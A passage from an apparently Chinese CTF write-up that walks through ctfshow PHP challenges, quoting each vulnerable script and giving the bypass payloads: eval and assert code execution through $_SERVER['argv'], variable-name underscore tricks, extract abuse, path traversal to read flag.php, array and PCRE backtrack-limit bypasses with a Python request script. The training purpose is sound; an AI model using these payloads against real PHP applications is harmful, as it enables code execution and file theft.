class="string">&#x27;36&#x27;</span> <span class="keyword">and</span> filter(<span class="variable">$num</span>)==<span class="string">&#x27;36&#x27;</span>)&#123;</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$num</span>==<span class="string">&#x27;36&#x27;</span>)&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;hacker!!&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;hacker!!!&quot;</span>;</span><br><span class="line">&#125; hacker!!!</span><br></pre></td></tr></table></figure>

<p>知识点：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">is_numeric() 检测变量是否为数字或数字字符串</span><br><span class="line"></span><br><span class="line">trim() 去除字符串首尾处的空白字符（或者其他字符）、如果不指定第二个参数，trim() 将去除这些字符：</span><br><span class="line"></span><br><span class="line">    &quot; &quot; (ASCII 32 (0x20))，普通空格符。</span><br><span class="line">    &quot;\t&quot; (ASCII 9 (0x09))，制表符。</span><br><span class="line">    &quot;\n&quot; (ASCII 10 (0x0A))，换行符。</span><br><span class="line">    &quot;\r&quot; (ASCII 13 (0x0D))，回车符。</span><br><span class="line">    &quot;\0&quot; (ASCII 0 (0x00))，空字节符。（空字符）  %0c也相当于空字符</span><br><span class="line">    &quot;\x0B&quot; (ASCII 11 (0x0B))，垂直制表符</span><br><span class="line"></span><br><span class="line">chr() 返回ascii 所对应的单个字符。</span><br><span class="line"></span><br><span class="line">此函数与 ord() 是互补的。ord() 转换字符串第一个字节为 0-255 之间的值chr() </span><br></pre></td></tr></table></figure>

<p>分析：</p>
<p>is_numeric($num)要求num识别为数字，但num不能强等于“36“</p>
<p>trim($num)!==’36’要求不能强等于”36“,然后filter之后要弱等于36</p>
<p>$num==’36’但最后要求弱等于”36”</p>
<p>如何绕过is_numeric()和trim()? Fuzz测试一下</p>
<p>测试is_numeric</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">for ($i=0; $i &lt;128 ; $i++) &#123;</span><br><span class="line">	$x=chr($i).&#x27;36&#x27;;</span><br><span class="line">	if(is_numeric($x)===true)&#123;</span><br><span class="line">		echo urlencode(chr($i)).&quot;\n&quot;;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"> </span><br><span class="line">//输出%09 %0A %0B %0C %0D + %2B - . 0 1 2 3 4 5 6 7 8 9</span><br></pre></td></tr></table></figure>

<p>测试trim和numeric</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">for($i=0;$i&lt;=128;$i++) &#123;</span><br><span class="line">	$x=chr($i).&#x27;36&#x27;;</span><br><span class="line">	if(trim($x)!==&#x27;36&#x27; &amp;&amp;is_numeric($x))&#123;</span><br><span class="line">		echo urlencode(chr($i)).&quot;\n&quot;;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"> </span><br><span class="line">//输出结果%0C %2B - . 0 1 2 3 4 5 6 7 8 9</span><br></pre></td></tr></table></figure>

<p>除去被过滤的+ - .  只剩下%0c ，也就是换页符\f</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload:?num=%0c36</span><br></pre></td></tr></table></figure>

<p>对于绕过，如果不知道怎么绕过就拿ASCII码把所有字符跑一遍</p>
<h1 id="web123"><a href="#web123" class="headerlink" title="web123"></a>web123</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line"><span class="variable">$a</span>=<span class="variable">$_SERVER</span>[<span class="string">&#x27;argv&#x27;</span>];</span><br><span class="line"><span class="variable">$c</span>=<span class="variable">$_POST</span>[<span class="string">&#x27;fun&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;CTF_SHOW&#x27;</span>])&amp;&amp;<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;CTF_SHOW.COM&#x27;</span>])&amp;&amp;!<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;fl0g&#x27;</span>]))&#123;</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/\\\\|\/|\~|\`|\!|\@|\#|\%|\^|\*|\-|\+|\=|\&#123;|\&#125;|\&quot;|\&#x27;|\,|\.|\;|\?/&quot;</span>, <span class="variable">$c</span>)&amp;&amp;<span class="variable">$c</span>&lt;=<span class="number">18</span>)&#123;</span><br><span class="line">         <span class="keyword">eval</span>(<span class="string">&quot;<span class="subst">$c</span>&quot;</span>.<span class="string">&quot;;&quot;</span>);  </span><br><span class="line">         <span class="keyword">if</span>(<span class="variable">$fl0g</span>===<span class="string">&quot;flag_give_me&quot;</span>)&#123;</span><br><span class="line">             <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">         &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span> </span><br></pre></td></tr></table></figure>

<p>此处的php特性：在php中变量名字是由数字字母和下划线组成的，所以不论用post还是get传入变量名的时候都将空格、+、点、[转换为下划线，但是用一个特性是可以绕过的，就是当[提前出现后，后面的点就不会再被转义了，such as：CTF[SHOW.COM=&gt;CTF_SHOW.COM</p>
<p><code>payload：CTF_SHOW=1&amp;CTF[SHOW.COM=1&amp;fun=echo $flag</code></p>
<h1 id="web125"><a href="#web125" class="headerlink" title="web125"></a>web125</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line"><span class="variable">$a</span>=<span class="variable">$_SERVER</span>[<span class="string">&#x27;argv&#x27;</span>];</span><br><span class="line"><span class="variable">$c</span>=<span class="variable">$_POST</span>[<span class="string">&#x27;fun&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;CTF_SHOW&#x27;</span>])&amp;&amp;<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;CTF_SHOW.COM&#x27;</span>])&amp;&amp;!<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;fl0g&#x27;</span>]))&#123;</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/\\\\|\/|\~|\`|\!|\@|\#|\%|\^|\*|\-|\+|\=|\&#123;|\&#125;|\&quot;|\&#x27;|\,|\.|\;|\?|flag|GLOBALS|echo|var_dump|print/i&quot;</span>, <span class="variable">$c</span>)&amp;&amp;<span class="variable">$c</span>&lt;=<span class="number">16</span>)&#123;</span><br><span class="line">         <span class="keyword">eval</span>(<span class="string">&quot;<span class="subst">$c</span>&quot;</span>.<span class="string">&quot;;&quot;</span>);</span><br><span class="line">         <span class="keyword">if</span>(<span class="variable">$fl0g</span>===<span class="string">&quot;flag_give_me&quot;</span>)&#123;</span><br><span class="line">             <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">         &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/reserved.variables.argv.php">$argv</a>：传递给脚本的参数数组</p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/luomir/p/5129875.html">详解 $_SERVER 函数中QUERY_STRING和REQUEST_URI区别(转)</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">$_SERVER[&#x27;argv&#x27;]：</span><br><span class="line"></span><br><span class="line">1、cli模式（命令行）下</span><br><span class="line"></span><br><span class="line">	第一个参数$_SERVER[&#x27;argv&#x27;][0]是脚本名，其余的是传递给脚本的参数</span><br><span class="line"></span><br><span class="line">2、web网页模式下</span><br><span class="line"></span><br><span class="line">	在web页模式下必须在php.ini开启register_argc_argv配置项</span><br><span class="line">	</span><br><span class="line">    设置register_argc_argv = On(默认是Off)，重启服务，$_SERVER[‘argv’]才会有效果</span><br><span class="line"></span><br><span class="line">    这时候的$_SERVER[‘argv’][0] = $_SERVER[‘QUERY_STRING’]</span><br><span class="line"></span><br><span class="line">    $argv,$argc在web模式下不适用</span><br></pre></td></tr></table></figure>

<p>我们是在网页模式下的，注意重点：<br> <code>$_SERVER[‘argv’][0] = $_SERVER[‘QUERY_STRING’]</code><br> 而 <code>$_SERVER[‘QUERY_STRING’]</code> <strong>是获取查询语句，也就是?后面的语句</strong></p>
<p>举个例子</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?$fl0g=flag_give_me</span><br><span class="line">$a[0]=$_SERVER[&#x27;argv&#x27;][0]=$_SERVER[‘QUERY_STRING’]=&gt;$fl0g=flag_give_me</span><br></pre></td></tr></table></figure>

<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">CTF_SHOW=1&amp;CTF[SHOW.COM=1&amp;fun=eval($a[0]) # POST</span><br><span class="line">?$fl0g=flag_give_me; #GET</span><br><span class="line">CTF_SHOW=6&amp;CTF[SHOW.COM=6&amp;fun=highlight_file($_GET[1])    #POST</span><br><span class="line">?1=flag.php		#GET</span><br></pre></td></tr></table></figure>



<h1 id="web126"><a href="#web126" class="headerlink" title="web126"></a>web126</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line"><span class="variable">$a</span>=<span class="variable">$_SERVER</span>[<span class="string">&#x27;argv&#x27;</span>];</span><br><span class="line"><span class="variable">$c</span>=<span class="variable">$_POST</span>[<span class="string">&#x27;fun&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;CTF_SHOW&#x27;</span>])&amp;&amp;<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;CTF_SHOW.COM&#x27;</span>])&amp;&amp;!<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;fl0g&#x27;</span>]))&#123;</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/\\\\|\/|\~|\`|\!|\@|\#|\%|\^|\*|\-|\+|\=|\&#123;|\&#125;|\&quot;|\&#x27;|\,|\.|\;|\?|flag|GLOBALS|echo|var_dump|print|g|i|f|c|o|d/i&quot;</span>, <span class="variable">$c</span>) &amp;&amp; strlen(<span class="variable">$c</span>)&lt;=<span class="number">16</span>)&#123;</span><br><span class="line">         <span class="keyword">eval</span>(<span class="string">&quot;<span class="subst">$c</span>&quot;</span>.<span class="string">&quot;;&quot;</span>);  </span><br><span class="line">         <span class="keyword">if</span>(<span class="variable">$fl0g</span>===<span class="string">&quot;flag_give_me&quot;</span>)&#123;</span><br><span class="line">             <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">         &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>比上一题多过滤了一个；</p>
<p>我们可以使用assert()绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">assert() 断言：</span><br><span class="line"></span><br><span class="line">PHP 5</span><br><span class="line">bool assert ( mixed $assertion [, string $description ] )</span><br><span class="line"></span><br><span class="line">PHP 7</span><br><span class="line">bool assert ( mixed $assertion [, Throwable $exception ] )</span><br><span class="line"></span><br><span class="line">如果 assertion 是字符串，它将会被 assert() 当做 PHP 代码来执行</span><br><span class="line">可见，eval和assert都可以将字符当作代码执行，只不过assert不需要严格遵从语法，比如语句末尾的分号可不加</span><br><span class="line">?$fl0g=flag_give_me</span><br><span class="line">CTF_SHOW=6&amp;CTF[SHOW.COM=6&amp;fun=assert($a[0])</span><br></pre></td></tr></table></figure>



<h1 id="web127"><a href="#web127" class="headerlink" title="web127"></a>web127</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"> &lt;?php</span><br><span class="line"></span><br><span class="line">error_reporting(0);</span><br><span class="line">include(&quot;flag.php&quot;);</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line">$ctf_show = md5($flag);</span><br><span class="line">$url = $_SERVER[&#x27;QUERY_STRING&#x27;];</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">//特殊字符检测</span><br><span class="line">function waf($url)&#123;</span><br><span class="line">    if(preg_match(&#x27;/\`|\~|\!|\@|\#|\^|\*|\(|\)|\\$|\_|\-|\+|\&#123;|\;|\:|\[|\]|\&#125;|\&#x27;|\&quot;|\&lt;|\,|\&gt;|\.|\\\|\//&#x27;, $url))&#123;</span><br><span class="line">        return true;</span><br><span class="line">    &#125;else&#123;</span><br><span class="line">        return false;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">if(waf($url))&#123;</span><br><span class="line">    die(&quot;嗯哼？&quot;);</span><br><span class="line">&#125;else&#123;</span><br><span class="line">    extract($_GET);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">if($ctf_show===&#x27;ilove36d&#x27;)&#123;</span><br><span class="line">    echo $flag;</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://www.runoob.com/php/func-array-extract.html">extract(提取、抽取)函数</a>：通常情况结合数组使用</p>
<p>?ctf_show=ilove36d但是下划线被过滤了</p>
<p>自己写个fuzz脚本跑一下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">function waf($num)&#123;</span><br><span class="line">    if(preg_match(&#x27;/\`|\~|\!|\@|\#|\^|\*|\(|\)|\\$|\_|\-|\+|\&#123;|\;|\:|\[|\]|\&#125;|\&#x27;|\&quot;|\&lt;|\,|\&gt;|\.|\\\|\//&#x27;, $num))&#123;</span><br><span class="line">        return false;</span><br><span class="line">    &#125;else&#123;</span><br><span class="line">        return true;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">for($i = 0; $i&lt;129; $i++)&#123;</span><br><span class="line">	$num=chr($i);</span><br><span class="line">	if(waf($num))&#123;</span><br><span class="line">		echo &quot;未编码：&quot;.$num.&quot;   经过编码：&quot;.urlencode(chr($i)).&quot;\n&quot;;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>但是这里我们的目的是利用空格、点、左中括号、+来被自动转换为下划线，经过fuzz得到空格，但是不知道为什么我空格经过URL编码确是+，但是%20确实符合该题目</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?ctf%20show=ilove36d</span><br></pre></td></tr></table></figure>



<h1 id="web128"><a href="#web128" class="headerlink" title="web128"></a>web128</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"></span><br><span class="line"><span class="variable">$f1</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;f1&#x27;</span>];</span><br><span class="line"><span class="variable">$f2</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;f2&#x27;</span>];</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(check(<span class="variable">$f1</span>))&#123;</span><br><span class="line">    var_dump(call_user_func(call_user_func(<span class="variable">$f1</span>,<span class="variable">$f2</span>)));</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;嗯哼？&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">check</span>(<span class="params"><span class="variable">$str</span></span>)</span>&#123;</span><br><span class="line">    <span class="keyword">return</span> !preg_match(<span class="string">&#x27;/[0-9]|[a-z]/i&#x27;</span>, <span class="variable">$str</span>);</span><br><span class="line">&#125; <span class="literal">NULL</span> </span><br></pre></td></tr></table></figure>



<p><strong><a target="_blank" rel="noopener" href="https://www.cnblogs.com/lost-1987/articles/3309693.html">gettext()</a>拓展函数的用法</strong>：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">_()是gettext()的拓展函数</span><br><span class="line">在开启相关设定后，_(&quot;666&quot;)等价于gettext(&quot;666&quot;)，且就返回其中的参数</span><br><span class="line"></span><br><span class="line">&lt;?php</span><br><span class="line">echo gettext(666);   //输出 666</span><br><span class="line">echo &quot;\n&quot;;</span><br><span class="line">echo _(&quot;666&quot;);		//输出 666</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://www.runoob.com/php/php-get_defined_vars-function.html">get_defined_vars()函数</a>：返回由所有已定义变量所组成的数组 ，very顾名思义</p>
<p>因为$flag属于是被定义变量的范畴，所以利用<code>?f1=_&amp;f2=get_defined_vars</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">var_dump(call_user_func(call_user_func($f1,$f2)));</span><br><span class="line">var_dump(call_user_func(call_user_func(_,&#x27;get_defined_vars&#x27;)));</span><br><span class="line">var_dump(call_user_func(get_defined_vars));</span><br><span class="line">var_dump(get_defined_vars);</span><br></pre></td></tr></table></figure>



<h1 id="web129"><a href="#web129" class="headerlink" title="web129"></a>web129</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;f&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$f</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;f&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(stripos(<span class="variable">$f</span>, <span class="string">&#x27;ctfshow&#x27;</span>)&gt;<span class="number">0</span>)&#123;</span><br><span class="line">        <span class="keyword">echo</span> readfile(<span class="variable">$f</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://php.p2hp.com/manual/zh/function.stripos.php">stripos()函数</a></p>
<p><a target="_blank" rel="noopener" href="https://php.p2hp.com/manual/zh/function.readfile.php">readfile()函数</a>：<code>?f=/ctfshow/../../../../../../../var/www/html/flag.php</code>直接读就完事了</p>
<h1 id="web130"><a href="#web130" class="headerlink" title="web130"></a>web130</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;f&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$f</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;f&#x27;</span>];</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/.+?ctfshow/is&#x27;</span>, <span class="variable">$f</span>))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&#x27;bye!&#x27;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(stripos(<span class="variable">$f</span>, <span class="string">&#x27;ctfshow&#x27;</span>) === <span class="literal">FALSE</span>)&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&#x27;bye!!&#x27;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>php特性：</p>
<p>preg_match不识别数组，否则返回false，匹配一次返回1，没有返回0</p>
<p>if(0 === flase)返回值为false0不是强等于false的</p>
<p>stripos()函数对数组不识别，遇到数组会返回false</p>
<p>方法一：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?f=ctfshow[]</span><br></pre></td></tr></table></figure>

<p>方法二：</p>
<p>使用数组绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?f[]=666</span><br></pre></td></tr></table></figure>

<p>方法三：</p>
<p><strong>p神</strong>：<a target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/use-pcre-backtrack-limit-to-bypass-restrict.html">PHP利用PCRE回溯次数限制绕过某些安全限制</a></p>
<p>溢出回溯限制</p>
<p>利用脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url=<span class="string">&quot;http://.ctf.show:8080/&quot;</span></span><br><span class="line">data=&#123;</span><br><span class="line">    <span class="string">&#x27;f&#x27;</span>:<span class="string">&#x27;very&#x27;</span>*<span class="number">250000</span>+<span class="string">&#x27;ctfshow&#x27;</span></span><br><span class="line">&#125;</span><br><span class="line">r=requests.post(url,data=data)</span><br><span class="line"><span class="built_in">print</span>(r.text)</span><br></pre></td></tr></table></figure>



<h1 id="web131"><a href="#web131" class="headerlink" title="web131"></a>web131</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;f&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$f</span> = (<span class="keyword">String</span>)<span class="variable">$_POST</span>[<span class="string">&#x27;f&#x27;</span>];</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/.+?ctfshow/is&#x27;</span>, <span class="variable">$f</span>))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&#x27;bye!&#x27;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(stripos(<span class="variable">$f</span>,<span class="string">&#x27;36Dctfshow&#x27;</span>) === <span class="literal">FALSE</span>)&#123;</span><br><span class="line">        <span 